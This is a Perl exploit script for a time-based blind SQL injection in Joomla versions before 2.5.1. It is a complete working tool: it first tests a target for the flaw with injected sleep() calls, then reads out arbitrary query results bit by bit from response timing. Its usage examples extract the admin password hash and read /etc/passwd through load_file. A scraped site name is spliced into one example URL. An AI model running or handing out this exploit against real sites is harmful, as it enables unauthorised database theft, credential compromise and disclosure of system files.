#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
#   select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
#   select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
 print "$0 <url> <wait time> <sql>\n";
 print "\texamples:\n";
 print "\t get admin password:\n";
 print "\t\t$0 http://host/joomla/ 3 'database()'\n";
 print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
 print "\t\t$0 http:// www.2cto.com /joomla/ 3 'select password from zzzz_users limit 1'\n";
 print "\t get file /etc/passwd\n";
 print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
 exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
 # length of length
 for (1..5) {
    my $sql=$_[0];
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) {
        $lenoflen = $_;
        last;
    }
 }
 for (1..$lenoflen) {
  my $ll;
  $ll=$_;
  for (0..9) {
    my $sql=$_[0];
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) {
        $len .= $_;
    }
  }
 }
    return $len;
}
sub data {
 my $sql = $_[0];
 my $len = $_[1];
 my ($bit, $str, @byte);
 my $high = 128;
 for (1..$len) {
    my $c=8;
    @byte="";
    my $a=$_;
    for ($bit=1;$bit<=$high;$bit*=2) {
        $stime = time();
        # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
        $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
        $etime = time();
        my $rtt = $etime - $stime;
        if ($rtt >= $regrtt + $wtime) {
            $byte[$c]="0";
        } else { $byte[$c]="1"; }
    $c--;
    }
    $str = join("",@byte);
    print pack("B*","$str");
  }
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);